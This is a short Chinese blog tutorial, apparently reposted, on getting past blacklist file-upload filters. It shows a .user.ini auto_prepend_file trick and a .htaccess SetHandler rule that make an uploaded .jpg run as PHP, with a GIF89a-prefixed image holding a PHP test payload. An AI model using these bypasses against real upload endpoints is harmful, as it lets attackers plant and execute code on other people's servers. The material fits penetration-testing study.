黑名单文件上传绕过

其他 2020-02-22 10:27:28 阅读次数: 0

黑名单文件上传绕过

  • 我在西北,一山又一山。与你相隔,一关又一关。

漏洞概述:

  • .htaccess用于Apache
  • .user.ini用于php

漏洞复现:

  • .user.ini
    原理:
    .user.ini将所有php文件自动包含任意木马文件执行。
    使用条件:
    只要以cgi/FastCGI/fpm模式运行的php,并且上传目录下要有正常可执行的php文件,都可以成功包含

    上传1.user.ini

auto_prepend_file=1.jpg

然后上传1.jpg

GIF89a
<?php
phpinfo();
?>

访问正常php文件,即可成功包含
在这里插入图片描述

  • .htaccess

前提apache,需要开启

 Options FollowSymLinks
 AllowOverride All 
 LoadModule rewrite_module modules/mod_rewrite.so

然后上传1.htaccess

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

访问1.jpg即可执行php

**余生很长,请多指教。**

在这里插入图片描述

SoulCat.
发布了41 篇原创文章 · 获赞 24 · 访问量 5万+
私信 关注

猜你喜欢

转载自blog.csdn.net/csacs/article/details/102722166
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
周排行
循环神经网络(rnn)讲解
Tigao教程四:单独的关节运动
金蝶K3WISE15.0-注册套打教程
如何在Mac上配置Kubernetes
Android应用结束自身进程的方法
SpringMVC学习 十三 拦截器栈
中国驻洛杉矶总领馆举行新春招待会
HttpClient get post 发送
11 - three.js 笔记 - 绘制三维字体模型
Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点
每日归档
更多
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022